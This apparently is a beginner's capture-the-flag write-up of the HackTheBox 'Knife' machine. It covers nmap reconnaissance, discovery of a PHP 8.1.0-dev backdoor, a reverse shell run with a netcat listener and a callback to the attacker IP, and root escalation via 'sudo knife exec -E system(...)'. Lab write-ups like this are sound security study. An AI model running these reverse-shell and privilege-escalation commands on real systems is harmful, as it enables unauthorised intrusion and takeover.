HTB —Knife

Abstract

1. Assessing HTTP requests
2. Exploit php 8.1.0-dev to get backdoor and reverse shell
3. Exploit knife to issue OS command as root

Introduction

Hi people! In this post, I will be talking about my first ever “not-cheating” machine takeover including the “cheating” and the “not-cheating” one (haha, yikes).

This machine is rated as easy, however, it teaches me a lot as a beginner and I am looking forward to trying the other machine takeovers.

Reconnaissance/Information gathering

First of all, we need to perform a Nmap scan. I use the following script

nmap -A -v 10.10.10.242
Legends:
A : a lot of scans (version detection, OS detection, script scan) pretty much almost basic things you need. 
v : verbose, display more deeper reports. 

From the Nmap scan, we can see that 2 ports are open 22 and 80.

Nmap scan result

To be very honest, there is no somewhat valuable information to work with, so let’s just access it. Port 22 which is SSH, needs a user name and password, we do not have that (assuming brute force is not an option). Port 80 which is a web application, we can try to access that.

Web application

As usual, I try to dig down to the source code, find any meaningful JS and possible HTML comments and got nothing (this usually takes some time). Since we do not find anything interesting, we back to our first recon, maybe we can find something interesting.

back to the Nmap scan result

Something is interesting in port 80, HTTP methods. There is 1 method, OPTIONS that I want to try since it is not common for me. You can read more about OPTIONS method here.

Since this is related to HTTP methods, I try to curl it.

curl -X OPTIONS http://10.10.10.242 -i
Capital X for http method.

It returns the source code of the page along with its response header.

Response header

There is interesting information for X-Powered-By.

PHP/8.1.0-dev

Now let’s try to research.

Google search result.

Searchsploit Result

From google search results, we can figure out that PHP 8.1.0-dev is vulnerable to remote code execution (RCE). It is also good practice to look at searchsploit. However, in this case, Google’s result is more reliable and clear.

After a while of searching and digging, I finally find the right tools. You can download it here.

Execution

I start with reading the readme document.

backdoor_php_8.1.0-dev.py documentation

revshell_php_8.1.0-dev.py

From this documentation and my humble understanding, 2 scripts should be executed. the Backdoor file is required to upload the backdoor and the revshell is to create the reverse shell to enable us communicating with the compromised server.

Uploading the backdoor

Some commands that I try:
1. whoami --> james
2. ls home/james (because the flag is usually here) --> user.txt
3. cat home/james/user.txt --> [user flag]
4. sudo -l (to know any sudo commands available for james) --> 
Matching Defaults entries for james on knife:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User james may run the following commands on knife:
    (root) NOPASSWD: /usr/bin/knife

We know, that the knife command is available to be called as root without password.

Knife

So to, I read some articles about privilege escalation and most of them almost say the same thing that we need to find commands that can be executed as root or process that has been running as root and has vulnerabilities that provide privilege escalation. In this case, knife command can be run as root. I try to research what knife command can do especially something around executing OS command.

Knife can execute OS command by issuing
sudo knife exec -E 'system("input your OS command")'

However, I find an error when executing it in the previous shell (through backdoor exploit), so I try the second file, the reverse shell. In order to utilise the reverse shell, we need to prefer 3 things.

1. Host/Target/Victim IP: We have that.
2. Our IP address: Can be obtained from ifconfig -a.
3. Our receiving/listening port: Can be opened by nc -nvlp your_port (nc -nvlp 4444). It will keep listening and waiting for connection.

Then we can execute the exploit

python3 revshell_php_8.1.0-dev.py http://10.10.10.242 10.10.16.5 4444
Note: Please note that u need to use 2 terminal. One for executing the exploit ("first terminal") and 1 for listening and interacting with the incoming connection ("second terminal"). 

After executing the exploit, see the second terminal, we can interact with the system, similar to the previous one. Then, we can execute our exploit.

sudo knife exec -E 'system("cat /root/root.txt")'

And then we get the root flag.

Notes

I do not have to perform the OPTIONS curl since it can be obtained in the browser.

Information from browser

I do not actually know the difference between the python exploits so it might be an incorrect explanation (sorry), however, I'm pretty sure it works.